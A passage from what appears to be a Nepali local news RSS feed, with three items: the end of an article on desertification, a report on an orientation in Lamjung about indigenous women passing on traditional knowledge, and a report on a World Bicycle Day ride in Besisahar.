उर्वर भूमिको जङ्गल विनाश हुनु, अत्यधिक दोहनका साथ कृषि प्रणाली अपनाइनु र सुक्खा खडेरीले आक्रान्त पारी उक्त भूमि बाँझोमा परिणत हुने कारण नै जमिन मरुभूमिकरण हुने अवस्था हो । जुन विश्वमा बढ्दो पारिस्थितिकीय–वातावरणीय समस्याका रूपमा देखापरेको छ । सुक्खा, खडेरी र मरुभूमिकरणका कारणले मानवतामाथि नै संकट उत्पन्न भएको अर्थमा बुझ्दा यसलाई न्यूनीकरण गर्दै अगाडि बढ्नु आजको आवश्यकता हो । भविष्यका लागि सीमित प्राकृतिक स्रोत साधनको अत्यधिक दोहन हुनबाट बचत गर्नु अहिलेको प्रमुख चुनौती बनेको छ । यो दिवसले त्यो चुनौती बदल्नेतर्फ विश्वलाई उत्प्रेरित गर्न सकोस् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49414 0
आदिवासी जनजाति महिलाको परम्परागत ज्ञान, सीपको पुस्तान्तरण बारे अभिमुखीकरण https://www.antaranganews.com/?p=49196 https://www.antaranganews.com/?p=49196#respond Sat, 06 Jun 2026 02:02:17 +0000 https://www.antaranganews.com/?p=49196 भूलभूले(लमजुङ)– लमजुङमा आदिवासी जनजाति महिलाको भूमिका विषयक अभिमुखीकरण गरिएको छ । आदिवासी जनजाति आयोग, पुल्चोक ललितपुरको आयोजनामा तथा मस्र्याङ्दी गाउँपालिका, भुलभुले लमजुङको सहकार्यमा मर्स्याङ्दी गाउँपालिकाको सभाहलमा जेठ २२ गते सो कार्यक्रम भएको हो ।
मर्स्याङ्दी गाउँपालिकाका अध्यक्ष अर्जुन गुरुङको अध्यक्षतामा सम्पन्न कार्यक्रममा उहाँले यो कार्यक्रमले आदिवासी जनजाति समुदायको मौलिक पहिचान, संस्कृति तथा परम्परागत ज्ञानको संरक्षण र प्रवद्र्धनमा सकारात्मक योगदान पुग्ने विश्वास व्यक्त गर्नु भएको थियो ।
‘परम्परागत ज्ञान, सीपको संरक्षण, संवद्र्धन र पुस्तान्तरणमा आदिवासी जनजाति महिलाको भूमिका‘ विषयक अभिमुखीकरण कार्यक्रममा आदिवासी जनजाति आयोगकी सदस्य रीना राणाले एक कार्यपत्र मार्फत विषयवस्तुको प्रस्तुतीकरण गर्नु भएको थियो । उहाँले आदिवासी जनजाति समुदायमा रहेका मौलिक ज्ञान, सीप, संस्कृति तथा परम्पराको संरक्षण र पुस्तान्तरणमा महिलाहरूको महत्वपूर्ण योगदान रहेको बताउनुभयो । उहाँले महिला सीप, ज्ञान, कला र शिक्षाका भण्डारर हुन्, प्रायः घरभित्रको काममा सीमित भए पनि उनीहरूबाट बालबालिकाले सिकिरहेका हुन्छन् महिलालाई बाहिर ल्याउन सशक्तिकरणको जरुरी छ भन्नुभयो । उहाँले महिला सशक्तिकरणका उपायका बारेमा समेत प्रकाश पार्नु भएको थियो । उहाँले क्षयीकरण हुँदै गएको आदिवासी जनजाति महिलाको भाषा, शिक्षा तथा सांस्कृतिक मूल्य क्षयीकरण हुँदै गएको प्रति चिन्ता व्यक्त गर्र्दै तिनलाई बचाउने चुनौति रहेको उल्लेख गर्नु भयो ।
उहाँले यस्ता ज्ञान र सीपलाई आधुनिक पुस्तासम्म हस्तान्तरण गर्न स्थानीय तह, समुदाय तथा सरोकारवाला निकायहरूको समन्वय आवश्यक रहेको धारणा व्यक्त गर्नुभयो । उहाँले महिला सशक्तिकरणका लागि संविधान प्रदत्त अधिकारका बारेमा समेत प्रकाश पार्दै सशक्तिकरणका उपायका बारेमा जानकारी दिनु भएको थियो ।
कार्यक्रममा सहभागीहरूले आदिवासी जनजाति महिलाको भूमिका, चुनौती तथा सम्भावनाका विषयमा आफ्ना विचार राख्दै परम्परागत ज्ञान र सीपको संरक्षणमा सबै पक्षको साझा प्रयास आवश्यक रहेको बताएका थिए ।
कार्यक्रममा उक्त गाउँपालिकाको नौवटै वडाका अगुवा महिलाहरूको प्रतिनिधित्व एवम् सहभागिता रहेको थियो ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49196 0
विश्व साइकल दिवसका अवसरमा साइकल यात्रा https://www.antaranganews.com/?p=49175 https://www.antaranganews.com/?p=49175#respond Thu, 04 Jun 2026 05:29:29 +0000 https://www.antaranganews.com/?p=49175 बेसीशहर– विश्व साइकल दिवस– २०८३ को अवसरमा लमजुङमा साइकल यात्रा भएको छ । लमजुङ साइक्लिङ संघको आयोजनामा सो यात्रा कार्यक्रम जेठ २० गते भएको हो ।
‘साइकल हाम्रो साथी, स्वास्थ्य हाम्रो सम्पत्ति, आउनुहोस् सहभागी बनौँ, विश्व साइकल दिवसलाई सफल बनाऔँ’ भन्ने नारासहित साइकल यात्रा गरिएको हो ।

साइकल यात्राका क्रममा जिल्ला सदरमुकाम बेसीशहरबाट सुरु भकुण्डे गैरी हुँदै नरुवाल पार्कसम्म पुगेको थियो । करिब ७ दशमलव ९ किलोमिटर दूरीको उक्त साइक्लिङमा विभिन्न उमेर समूहका साइकलप्रेमी, खेलाडी, युवा तथा सर्वसाधारण गरी १३ जनाले भाग लिएको लमजुङ साइक्लिङ संघका अध्यक्ष ध्रुवराम प्रधानले बताउनुभयो । उहाँका अनुसार सो यात्राका क्रममा सहभागीहरूको उत्साहजनक उपस्थिति थियो ।
कार्यक्रममा सहभागीहरूले बेसीशहर बजार क्षेत्र हुँदै प्राकृतिक सौन्दर्यले भरिपूर्ण भकुण्डे गैरी र नरुवाल पार्कसम्मको यात्रा गर्दै साइकल चलाउने संस्कृतिको विकासमा जोड दिएका थिए । साथै, आगामी दिनमा पनि यस्ता जनचेतनामूलक तथा स्वास्थ्य प्रवद्र्धनसम्बन्धी कार्यक्रमलाई निरन्तरता दिने प्रतिबद्धता आयोजकले व्यक्त गरेको छ ।
विश्व साइकल दिवस हरेक वर्ष जुन ३ तारिखका दिन मनाइँदै आइएको छ । यस दिवसले दिगो यातायात, स्वस्थ जीवनशैली र वातावरणमैत्री अभ्यासलाई प्रोत्साहन गर्ने उद्देश्य राखेको छ । लमजुङमा आयोजित यस कार्यक्रमले पनि साइकलप्रतिको आकर्षण बढाउनुका साथै स्वस्थ र हरित समाज निर्माणको सन्देश प्रवाह गरेको छ ।
साइकल प्रयोगलाई दैनिक जीवनसँग जोड्दै स्वास्थ्य प्रवद्र्धन, वातावरण संरक्षण तथा इन्धनको खपत न्यूनीकरण गर्ने उद्देश्यले कार्यक्रम आयोजना गरिएको आयोजकले जनाएको छ । सवारी साधनको बढ्दो प्रयोगका कारण देखिएको प्रदूषण न्यूनीकरण गर्न र शारीरिक तथा मानसिक स्वास्थ्यलाई सुदृढ बनाउन साइकल महत्वपूर्ण माध्यम भएको अध्यक्ष प्रधानको भनाई छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49175 0